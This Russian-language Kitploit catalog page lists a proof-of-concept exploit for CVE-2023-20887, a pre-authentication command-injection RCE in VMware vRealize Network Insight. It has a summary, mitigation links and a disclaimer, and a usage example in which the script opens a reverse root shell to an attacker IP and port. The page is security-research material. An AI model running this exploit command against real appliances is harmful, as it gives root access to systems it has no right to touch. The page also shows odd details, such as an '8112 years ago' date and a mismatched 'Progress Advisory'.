Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-20887 — VMWare vRealize Network Insight — RCE до аутентификации (CVE-2023-20887) | Kitploit
Инструменты/GitHubGitHub/malwareman007/cve-2023-20887
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubmalwareman007/cve-2023-20887

CVE-2023-20887

VMWare vRealize Network Insight — RCE до аутентификации (CVE-2023-20887)

Репозиторий
8112 лет назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-20887

POC для CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight): удалённое выполнение кода (RCE) без аутентификации

Технический анализ

Анализ первопричины уязвимости можно найти в моём блоге: https://kushagraojha.medium.com/vmware-vrealize-network-insight-cve-2023-20887-193f3c3d30a0

Сводка

VMWare Aria Operations for Networks (vRealize Network Insight) подвержен внедрению команд при приёме пользовательского ввода через интерфейс Apache Thrift RPC. Данная уязвимость позволяет удалённому неаутентифицированному злоумышленнику выполнять произвольные команды в базовой операционной системе от имени пользователя root. Интерфейс RPC защищён обратным прокси, который можно обойти. VMware оценила серьёзность данной проблемы как критическую с максимальной базовой оценкой CVSSv3 9.8. Злоумышленник может получить удалённое выполнение кода в контексте пользователя 'root' на устройстве. Версии VMWare 6.x уязвимы.

Использование

root@kitploit:~
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release

Меры по устранению

Обновитесь до последней версии или примите меры по устранению, следуя инструкциям, приведённым в Progress Advisory.

  • https://www.vmware.com/security/advisories/VMSA-2023-0012.html

Отказ от ответственности

Данное программное обеспечение создано исключительно в целях академических исследований и разработки эффективных защитных методов и не предназначено для атак на системы, за исключением случаев, когда это явно разрешено. Сопровождающие проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.

Скачать инструмент